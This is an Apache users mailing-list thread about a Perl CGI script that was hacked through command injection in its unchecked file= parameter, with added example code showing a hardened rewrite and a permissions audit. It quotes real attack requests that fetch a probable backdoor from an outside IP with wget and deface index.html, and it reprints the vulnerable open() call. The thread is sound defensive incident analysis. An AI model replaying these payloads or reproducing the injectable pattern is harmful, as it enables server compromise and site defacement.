Posted to users@httpd.apache.org by Murthy Ambaru <bo...@yahoo.com> on 2004/12/05 21:24:25 UTC

[users@httpd] Security Problem

I have a question regarding security. There is a web site that has a printer-friendly version of web pages being displayed using a CGI script. Apparently when this was in use, the site was hacked and some unwanted stuff posted on the site. I had a look at the access.log when this occurred and this was what showed up (I just replaced the site name with xyz, everything else is the same): 
 

/images/newswireprint.gif HTTP/1.0" 304 -
"http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind|" "Mozilla/4.0

GET /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/vhosts/xyz.org/httpdocs/index.html|


Can anyone understand how they are able to hack? I tried reproducing it by typing in the above URL used by the hackers, but could get nothing out of it. The permissions on all the html docs folders are set to 755.

Below is the CGI file being used. It basically strips images off. Can anyone help with this problem? What should I be looking at to plug the security holes.... Thanks a lot

-Murthy

 

#!/usr/local/bin/perl

print "Content-type: text/html\n\n";

&parseForm;

# Print the static header of the printer-friendly page.
open(HEADER,"printheader.html") ;
my @HEADER = <HEADER>;
close(HEADER);
#print it! Put a # before print if you don't want a header printed...
print "@HEADER";

# The file= parameter is appended to the path exactly as received.
my $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";

# Two-argument open on a string that contains the unchecked file= parameter.
if (!open(FILE,"$data_file")) { die "Can't open";}
my @FILE = <FILE>;
close(FILE);

# Copy the page through, skipping the lines between a beginimage marker
# and the next endimage marker.
$print = 1 ;

foreach $line(@FILE) {
        if ($line =~ /beginimage/) {
                print $line ;
                $print = 0;
                next ;
        }
        if ($line =~ /endimage/) { $print = 1 ; }
        if ($print eq "1") {
                print $line;
        }
}

########################################################

# Splits the GET query string or the POST body into %FORM,
# URL-decoding each value.
sub parseForm {
    if ($ENV{'REQUEST_METHOD'} eq 'GET') {
        # Split the name-value pairs
        @pairs = split(/&/, $ENV{'QUERY_STRING'});
    }
    elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
        read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
        # Split the name-value pairs
        @pairs = split(/&/, $buffer);
    }
    foreach $pair (@pairs) {
        ($name, $value) = split(/=/, $pair);
        # Un-Webify plus signs and %-encoding
        $value =~ tr/+/ /;
        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
        $FORM{$name} = $value;
    }
}



Re: [users@httpd] Security Problem

Posted by "Ivan Barrera A." <Br...@Ivn.cl>.
aha... if it is Windows, just run an antivirus, Ad-Aware and look for 
some strange processes.

The correct way is to read files only from a relative path, i.e. just 
let the cgi access the files under /www/docs without having write 
permissions, and parse the url so it does not include "..", "." or "|" 
and no non-standard characters. There are lots of other fixes too..
I'm not so good at Perl, so I recommend you google around and look at 
other scripts. I hope someone here could lead you to fix this properly.


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
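Ivan's advice (read only from one fixed directory, reject "..", "." and "|") carried through as an added Perl example; this is not code from the thread, the function names are mine, and the only value taken from the script is the scriptfiles directory. It also shows why the two-argument open is the actual hole: with a trailing pipe Perl runs the string as a command and reads its output, and a three-argument read-only open closes that regardless of what the parameter contains.

```perl
#!/usr/bin/perl
# Added example, not the xyz.cgi from the thread: a hardened replacement for
# the "$data_file" / open() step.  The original calls open(FILE, "$data_file")
# with two arguments, so a value ending in "|" makes Perl run the text before
# the pipe as a shell command and read its output.  That is how
# "?file=/2004/0722-08.htm|wget ... -O/tmp/bind|" ran wget on the server.
use strict;
use warnings;

# Directory the CGI may read from (path taken from the script in the thread).
my $DOC_ROOT = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles";

# Undo the URL encoding exactly the way the thread's parseForm does, so the
# checks below see the same string the script would have used.
sub decode_param {
    my ($value) = @_;
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9]{2})/pack("C", hex($1))/eg;
    return $value;
}

# Returns the absolute path to read, or undef when the request is rejected.
# A whitelist (not a blacklist of "|", "%" or "wget") is used: only path
# segments of [A-Za-z0-9_-], an optional leading "/", and a .htm/.html name.
# That leaves no room for "..", ".", "|", ">", spaces or shell metacharacters.
sub safe_article_path {
    my ($file, $root) = @_;
    $root = $DOC_ROOT unless defined $root;
    return undef unless defined $file;
    return undef unless $file =~ m{\A/?(?:[A-Za-z0-9_-]+/)*[A-Za-z0-9_-]+\.html?\z};
    $file =~ s{\A/+}{};                 # drop the leading "/" before joining
    return "$root/$file";
}

# Reads an article with a three-argument, read-only open.  The "<" mode is
# fixed in code, so the filename can never be interpreted as a pipe or command.
sub read_article {
    my ($file) = @_;
    my $path = safe_article_path($file);
    return undef unless defined $path && -f $path;
    open(my $fh, '<', $path) or return undef;
    my @lines = <$fh>;
    close($fh);
    return \@lines;
}

# Constructed check: the legitimate file= value a printer-friendly link sends,
# followed by the two file= values from the access log quoted in the thread.
my @samples = (
    '/2004/0722-08.htm',
    '/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind|',
    '|echo%20innocent%20boys...%20%3E%20/data/httpd/vhosts/xyz.org/httpdocs/index.html|',
);

for my $raw (@samples) {
    my $decoded = decode_param($raw);
    my $path    = safe_article_path($decoded);
    my $verdict = defined $path ? 'ACCEPT' : 'REJECT';
    printf "%-6s %s\n", $verdict, $decoded;
}
```

A check for "%" or "wget" in the value, as proposed later in the thread, is not enough on its own: the "|" in the logged requests is not encoded at all, and parseForm has already decoded the rest by the time the path is built.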


Re: [users@httpd] Security Problem

Posted by Murthy Ambaru <bo...@yahoo.com>.
Thanks Dick and Ivan for the input.... Well, the programmer who worked on this is no longer here. So would it be sufficient if I just check in the parse form if the input file has any kind of weird characters (such as %, |, wget etc.) and if it does, redirect it somewhere else? Or should I check if the file exists in the system? I thought of doing this initially, but I could not reproduce what the hacker did by using the same command. I wanted to reproduce it and then correct the script and retest it again so as to be sure that it is fixed.
Also, this is not in Linux (it's Windows), so what should I do to check that the system is not already compromised.... thanks a lot


Re: [users@httpd] Security Problem

Posted by "Ivan Barrera A." <Br...@Ivn.cl>.
As I see, you take the parameter file from the URL without parsing it 
(as Dick explained in another post too)

  my $data_file =
  "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
  if (!open(FILE,"$data_file")) { die "Can't open";}

You are not checking if the file is really valid, and are passing 
additional cmds without even noticing. (The pipe is really dangerous.)

As Dick said... ask your programmer to fix this right up. (And try to 
examine your machine.. it may be already compromised.. if on Red Hat run 
rpm -VVV procps net-tools util-linux rpm; if nothing comes up, you're good.)



Murthy Ambaru wrote:
> Thanks for the explanation. So the file can be downloaded to the /tmp/bind 
> directory on the server executing that script. As I said, I tried typing 
> in the URL used and got nothing. I did not check /tmp/bind though (I 
> did not find that in the interface that I use to manage files on the 
> server). So what would be a secure way of opening the file?
> The script is in Perl. I am adding it below. Can you see anything weird 
> in it?? Thanks...
>  
> #!/usr/local/bin/perl
> print "Content-type: text/html\n\n";
> &parseForm;
> open(HEADER,"printheader.html") ;
> my @HEADER = <HEADER>;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
> my $data_file = 
> "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> if (!open(FILE,"$data_file")) { die "Can't open";}
> my @FILE = <FILE>;
> close(FILE);
> $print = 1 ;
> foreach $line(@FILE) {
>         if ($line =~ /beginimage/) {
>                 print $line ;
>                 $print = 0;
>                 next ;
>         }
>         if ($line =~ /endimage/) { $print = 1 ; }
>         if ($print eq "1") {
>                 print $line;
>         }
> }
> 
> ########################################################
> sub parseForm {
>     if ($ENV{'REQUEST_METHOD'} eq 'GET') {
>         # Split the name-value pairs
>         @pairs = split(/&/, $ENV{'QUERY_STRING'});
>     }
> elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
> 
>  read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
>    # Split the name-value pairs
>    @pairs = split(/&/, $buffer);
> }
>    foreach $pair (@pairs) {
>       ($name, $value) = split(/=/, $pair);
>       # Un-Webify plus signs and %-encoding
>       $value =~ tr/+/ /;
>       $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
>       $FORM{$name} = $value;
>       }
> }
> 
> 
> */"Ivan Barrera A." <Br...@Ivn.cl>/* wrote:
> 
>     I mean, the cgi script (which I don't know anything about) seems to
>     "open" a file referred to by ?file= ... Probably an insecure way of
>     "opening" the file leads to executing the rest of the statement.
> 
>     Look :
> 
>     ?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind
> 
>     After the correct page, a pipe, and wget http://blabla/bind -O/tmpbind
>     is appended. So, if the script executes this, the command wget will
>     exec, and download that file into /tmp/bind.
>     After that, using the same technique, you can exec anything you
>     want. So the problem is the way of opening (or doing something else to)
>     the files in the cgi script.
>     Is it a C, Perl, PHP, or any other language script?
> 
>     Murthy Ambaru wrote:
>      > Thanks for the response Ivan. I am sorry I really did not
>      > understand what you mean by "download the file to /tmp/bind". When
>      > the printer friendly link is clicked, this is the URL that will be
>      > accessed:
>      > http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
>      > Of course it depends on the page being clicked at. So the file
>      > name will be passed as a parameter to the CGI file. I included the
>      > CGI code in my earlier mail, could you please take a look.
>      > Thanks,
>      > Murthy
>      >
>      > */"Ivan Barrera A." /* wrote:
>      >
>      > The url you entered downloads the file bind to /tmp/bind. It's
>      > probably an irc bot or a backdoor.
>      > If someone did that, the version of the cgi script is insecure, and
>      > should be revised.
>      >
>      > I'm sorry if I didn't clarify enough, but it would be useful to see
>      > that cgi.

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Re: [users@httpd] Security Problem

Posted by Murthy Ambaru <bo...@yahoo.com>.
Thanks for the explanation. So the file can be downloaded to the /tmp/bind directory on the server executing that script. As I said, I tried typing in the URL used and got nothing. I did not check /tmp/bind though (I did not find that in the interface that I use to manage files on the server). So what would be a secure way of opening the file?
The script is in PERL. I am adding it below. Can you see anything weird in it? Thanks...
 
#!/usr/local/bin/perl
print "Content-type: text/html\n\n";
&parseForm;

open(HEADER,"printheader.html") ;
my @HEADER = <HEADER>;
close(HEADER);
#print it! Put a # before print if you don't want a header printed...
print "@HEADER";

# $FORM{file} is used unchecked, and a two-argument open treats a name
# ending in '|' as a command to run rather than a file to read.
my $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
if (!open(FILE,"$data_file")) { die "Can't open";}
my @FILE = <FILE>;
close(FILE);

# Copy the page through, dropping everything between beginimage and endimage.
$print = 1 ;
foreach $line (@FILE) {
    if ($line =~ /beginimage/) {
        print $line ;
        $print = 0;
        next ;
    }
    if ($line =~ /endimage/) { $print = 1 ; }
    if ($print eq "1") {
        print $line;
    }
}

########################################################
sub parseForm {
    if ($ENV{'REQUEST_METHOD'} eq 'GET') {
        # Split the name-value pairs
        @pairs = split(/&/, $ENV{'QUERY_STRING'});
    }
    elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
        read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
        # Split the name-value pairs
        @pairs = split(/&/, $buffer);
    }
    foreach $pair (@pairs) {
        ($name, $value) = split(/=/, $pair);
        # Un-Webify plus signs and %-encoding
        $value =~ tr/+/ /;
        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
        $FORM{$name} = $value;
    }
}


"Ivan Barrera A." <Br...@Ivn.cl> wrote:
I mean, the cgi script (which i dont know anything about) seems to "open 
" a file reffered by ?file= ... Probably an insecure way of "opening" 
the file, leads to execute the rest of the statement.

Look :

?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind

After the correct page, a pipe, and wget http://blabla/bind -O/tmpbind 
is appended. So , if the script execute this, the command wget will 
exec, and download that file into /tmp/bind.
After that, using the same technique, you can exec anything you want. so 
the problem is the way of opening (or doing something else) to the files 
in the cgi script.
is it a c , perl , php , or any other language script ?


Re: [users@httpd] Security Problem

Posted by "Ivan Barrera A." <Br...@Ivn.cl>.
I mean, the CGI script (which I don't know anything about) seems to "open" 
a file referred to by ?file= ... Probably an insecure way of "opening" 
the file leads to executing the rest of the statement.

Look:

?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind

After the correct page, a pipe, and wget http://blabla/bind -O/tmp/bind 
is appended. So, if the script executes this, the command wget will 
exec, and download that file into /tmp/bind.
After that, using the same technique, you can exec anything you want. So 
the problem is the way of opening (or doing something else to) the files 
in the CGI script.
Is it a C, Perl, PHP, or any other language script?

Murthy Ambaru wrote:
> Thanks for the response Ivan. I am sorry i realy did not understand what 
> you mean by "download the file to /tmp/bind". when the printer friendly 
> link is clicked, this is the URL that will be accessed:
> http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
> ofcourse it depends on the page being clicked at. So the file name will 
> be passed as parameter to the CGI file. I included the CGI code in my 
> earlier mail, could you please take a look.
> Thanks,
> Murthy
> 


Re: [users@httpd] Security Problem

Posted by Murthy Ambaru <bo...@yahoo.com>.
Thanks for the response Ivan. I am sorry, I really did not understand what you mean by "download the file to /tmp/bind". When the printer friendly link is clicked, this is the URL that will be accessed:
http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
Of course it depends on the page being clicked. So the file name will be passed as a parameter to the CGI file. I included the CGI code in my earlier mail; could you please take a look.
Thanks,
Murthy

"Ivan Barrera A." <Br...@Ivn.cl> wrote:
the url you entered, download the file bind to /tmp/bind . It's probably 
an irc bot or a backdoor.
If someone did that, the version of the cgi script, is unsecure, and 
should be revised.

Im sorry if i didnt clarify enough, but would be useful to see that cgi.


Re: [users@httpd] Security Problem

Posted by "Ivan Barrera A." <Br...@Ivn.cl>.
The URL you entered downloads the file bind to /tmp/bind. It's probably 
an IRC bot or a backdoor.
If someone did that, the version of the CGI script is insecure and 
should be revised.

I'm sorry if I didn't clarify enough, but it would be useful to see that CGI.

Murthy Ambaru wrote:
> I have a question regarding security. There is a web site that has an 
> printer friendly version of web pages being dsiplayed using a CGI 
> script. Apparently when this was in use, the site was hacked and some 
> unwanted stuff posted on the site. I had a look at the access.log when 
> this occurred and this was what showed up(I just replaced the site name 
> with xyz, everything else is same):
>  
> 
> /images/newswireprint.gif HTTP/1.0" 304 -
> 
> "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> 
> 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| <http://64.58.72.242/bind%20-O/tmp/bind%7C>" "Mozilla/4.0
> 
> 
> GET 
> /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v 
> hosts/xyz.org/httpdocs/index.html|
> 
> Can anyone understand how are they able to hack? I tried reproducing it 
> by typing in the above URL used by hackers, but could get nothing out of 
> it. The permissions on all the html docs folders are set to 755.
> 
> Below is the CGI file being used. It basically strips images off. Can 
> anyone help with this problem? what should i be looking at to plug off 
> the security holes....Thanks a lot
> 
> -Murthy
> 
>  
> 


Re: [users@httpd] Security Problem

Posted by Murthy Ambaru <bo...@yahoo.com>.
Thanks a lot for the information Scott... It's very helpful.

Can you answer another question:
"Also, you should avoid having permissions set up such that CGI scripts
are allowed to overwrite your Web pages. That would have prevented
this, although there are a host of other security problems it wouldn't
make a difference for."
Isn't the permission for CGI scripts the same as world permissions? If it is different, how do I set it? Right now the HTML files have 755 access. That should be fine, right?
Thanks,
Murthy
 

Re: [users@httpd] Security Problem

Posted by Scott Gifford <sg...@suspectclass.com>.
Murthy Ambaru <bo...@yahoo.com> writes:

[...]

> /images/newswireprint.gif HTTP/1.0" 304 -
> "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind|" "Mozilla/4.0
>
> GET /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> hosts/xyz.org/httpdocs/index.html|
>
> Can anyone understand how are they able to hack? 

[...]

> #!/usr/local/bin/perl
>
> print "Content-type: text/html\n\n";
>
> &parseForm;
>
> open(HEADER,"printheader.html") ;
> my @HEADER = <HEADER>;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
>
> my $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
>
> if (!open(FILE,"$data_file")) { die "Can't open";}

This is a Perl question really; you should try asking on a Perl
mailing list/newsgroup or on PerlMonks.org, where you'd get a much
more complete answer from lots of experts.  I'll be happy to do my
best, though.

The essential problem is that Perl's open command will execute a
command if the name of the file it's opening ends with a pipe, so you
can do something like:

    open(LS,"ls |");

to read the output of ls.  In this case, it's trying to open:

    /data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file} |echo innocent boys... > /data/httpd/vhosts/xyz.org/httpdocs/index.html |

which ends up running:

    echo innocent boys... > /data/httpd/vhosts/xyz.org/httpdocs/index.html

which is how the page got hacked.

The solution is to disallow any characters besides letters and numbers
from the filename when you're accepting it, with something like:

    if ($FORM{file} =~ /^([\w.]+)$/)
    {
       $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$1";
    }
    else
    {
      die "Illegal characters in data file";
    }

You should really run your script in taint mode, by starting it with:

    #!/usr/local/bin/perl -T

That will make these sorts of things into runtime errors instead of
security issues, and will force you to fix similar problems in your
program.

Also, you should avoid having permissions set up such that CGI scripts
are allowed to overwrite your Web pages.  That would have prevented
this, although there are a host of other security problems it wouldn't
make a difference for.

You may want to read up on this topic, with something like:

    http://cvs.sourceforge.net/viewcvs.py/*checkout*/brian-d-foy/CGI_MetaFAQ/CGI_MetaFAQ.html?rev=HEAD&content-type=text/html#security

It's important to have a good understanding of security if you plan on
writing or taking responsibility for any sort of program that
interacts with the outside world, like a CGI script.

----ScottG.
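The script rewritten along the lines Scott describes (taint mode, a whitelist on the file parameter, a three-argument open), added here as an example and not code from the thread. Scott's `[\w.]+` pattern would also reject the slash and dash in the real link's path, so this whitelist admits those while still excluding `|` and `..`; the base directory and the beginimage/endimage markers come from the posted script, everything else is assumed.

```perl
#!/usr/local/bin/perl -T
# Added example, not the thread's own code: the printer-friendly CGI rewritten
# along the lines Scott describes (taint mode, whitelist on the file parameter,
# three-argument open). The base directory and the beginimage/endimage markers
# are from the posted script; everything else is assumed.
use strict;
use warnings;

my $BASE = '/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles';

# Parse application/x-www-form-urlencoded input into a hash. Under -T the
# values stay tainted, so nothing derived from them can reach open() unchecked.
sub parse_form {
    my ($raw) = @_;
    my %form;
    for my $pair (split /&/, $raw // '') {
        my ($name, $value) = split /=/, $pair, 2;
        next unless defined $name && $name ne '';
        $value = '' unless defined $value;
        for ($name, $value) {
            tr/+/ /;
            s/%([0-9A-Fa-f]{2})/chr hex $1/eg;
        }
        $form{$name} = $value;
    }
    return \%form;
}

# Whitelist: optional leading '/', path components of \w and '-', and a .htm
# or .html suffix. \w matches neither '.' nor '|', so '..' traversal and a
# shell pipe both fail here; the capture group is what untaints the value.
sub safe_data_file {
    my ($file) = @_;
    return undef unless defined $file;
    return undef unless $file =~ m{\A/?((?:[\w-]+/)*[\w-]+\.html?)\z};
    return "$BASE/$1";
}

# Same filter as the original: drop the lines between beginimage and
# endimage. Returns the filtered text, or undef if the file cannot be read.
sub strip_images {
    my ($path) = @_;
    # Explicit '<' mode: $path is only ever a file name, so a trailing '|'
    # can no longer turn it into a command.
    open my $fh, '<', $path or return undef;
    my ($print, $out) = (1, '');
    while (my $line = <$fh>) {
        if ($line =~ /beginimage/) { $out .= $line; $print = 0; next; }
        $print = 1 if $line =~ /endimage/;
        $out .= $line if $print;
    }
    close $fh;
    return $out;
}

if ($ENV{REQUEST_METHOD}) {
    # Running under the web server.
    my $raw = $ENV{QUERY_STRING};
    if ($ENV{REQUEST_METHOD} eq 'POST') {
        my ($len) = (($ENV{CONTENT_LENGTH} // 0) =~ /\A(\d{1,7})\z/);
        read STDIN, $raw, $len // 0;
    }
    my $path = safe_data_file(parse_form($raw)->{file});
    if (!defined $path) {
        print "Status: 400 Bad Request\nContent-type: text/plain\n\nIllegal characters in data file\n";
        exit 0;
    }
    my $body = strip_images($path);
    if (!defined $body) {
        print "Status: 404 Not Found\nContent-type: text/plain\n\nCan't open\n";
        exit 0;
    }
    print "Content-type: text/html\n\n";
    if (open my $hdr, '<', 'printheader.html') { local $/; print <$hdr>; close $hdr; }
    print $body;
} else {
    # Command-line self-check (run as "perl -T thisfile"): the normal link from
    # the thread, then the two query strings that appeared in the access log.
    for my $q ('file=/2004/0722-08.htm',
               'file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind|',
               'file=|echo%20innocent%20boys...%20%3E%20/data/httpd/vhosts/xyz.org/httpdocs/index.html|') {
        my $path = safe_data_file(parse_form($q)->{file});
        printf "%-7s %s\n", (defined $path ? 'accept' : 'reject'), $q;
    }
}
```

Run from a shell with `perl -T` (the `-T` on the #! line must also be given on the command line) and the self-check prints accept for the first query string and reject for the two from the log.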



Re: [users@httpd] Security Problem

Posted by Dick Davies <ra...@hellooperator.net>.
* Murthy Ambaru <bo...@yahoo.com> [1224 20:24]:
> I have a question regarding security. There is a web site that has an printer friendly version of web pages being dsiplayed using a CGI script. Apparently when this was in use, the site was hacked and some unwanted stuff posted on the site. I had a look at the access.log when this occurred and this was what showed up(I just replaced the site name with xyz, everything else is same): 
>  
> 
> /images/newswireprint.gif HTTP/1.0" 304 -
> 
> "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind|" "Mozilla/4.0
> 
> GET /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v hosts/xyz.org/httpdocs/index.html|
> 
> Can anyone understand how are they able to hack? I tried reproducing it by typing in the above URL used by hackers, but could get nothing out of it. 
> The permissions on all the html docs folders are set to 755.

That doesn't help you if apache can write to them, because your cgi is running as apache.


parseForm() doesn't check parameters properly. ?file=whatever is your problem here. 
I can call your cgi with file=<whatever I like>, and that's what's happened.

when you come to run this line:


> if (!open(FILE,"$data_file")) { die "Can't open";}

you actually open '|echo innocent boys.....> /data/httpd/v hosts/xyz.org/httpdocs/index.html' 

i.e. you overwrite your index page with a 'we are leet' type message.

A similar thing with the 'wget' line causes your server to pull stuff down off the net onto your machine;
it will be simple to run that script too. Chances are you have worse than just a defaced website....


> Below is the CGI file being used. It basically strips images off. 
> Can anyone help with this problem? 

> what should i be looking at to plug off the security holes....

Sack your programmer :) and get someone in who understands network programming; CGIs need to be very
careful when accepting arguments off the net.

-- 
Oh, wait you're serious. Let me laugh even harder. - Bender
Rasputin :: Jack of All Trades - Master of Nuns
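On the 755 question Murthy asked and Dick answers above: 755 still lets the owner write, so what matters is whether the user the CGI runs as owns, or can otherwise write, the files under the document root. The following audit script is an added example, not from the thread; it assumes the document root from the thread and a server user named apache, and is meant to be run as that user (not as root, for whom every file tests writable).

```perl
#!/usr/bin/perl
# Added example, not from the thread: list everything under the document root
# that the current (web server) user could overwrite. Run as the server user,
# e.g.  sudo -u apache perl docroot_writable.pl /data/httpd/vhosts/xyz.org/httpdocs
# The default path is the one from the thread; "apache" as the user is assumed.
use strict;
use warnings;
use File::Find;

my $docroot = $ARGV[0] // '/data/httpd/vhosts/xyz.org/httpdocs';

# Return the problems found for one path; an empty list means it is fine.
# A mode of 755 is not enough on its own: the owner can still write, so a
# file owned by the server user is writable by every CGI the server runs.
sub check_path {
    my ($path) = @_;
    my @st = lstat $path;
    return ("cannot stat: $!") unless @st;
    my ($mode, $uid) = @st[2, 4];
    return () if -l _;                      # symlinks: judge the target separately
    my @issues;
    push @issues, sprintf('owned by uid %d, the user this runs as', $uid) if $uid == $>;
    push @issues, 'world-writable' if $mode & 0002;
    push @issues, 'writable by this user' if -w $path;   # also catches group write
    return @issues;
}

# Walk the tree, report each offending path, and return how many there were.
# A writable directory counts too: the CGI could create new files there.
sub audit {
    my ($root) = @_;
    my $bad = 0;
    find({ no_chdir => 1, wanted => sub {
        my @issues = check_path($File::Find::name);
        return unless @issues;
        $bad++;
        printf "%s: %s\n", $File::Find::name, join('; ', @issues);
    } }, $root);
    return $bad;
}

my $bad = audit($docroot);
print $bad ? "$bad path(s) under $docroot could be modified by uid $>\n"
           : "nothing under $docroot is writable by uid $>\n";
exit($bad ? 1 : 0);
```

Anything it reports should be chowned to a separate deploy user with mode 644 (files) or 755 (directories), so the server user can read pages but not replace them.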
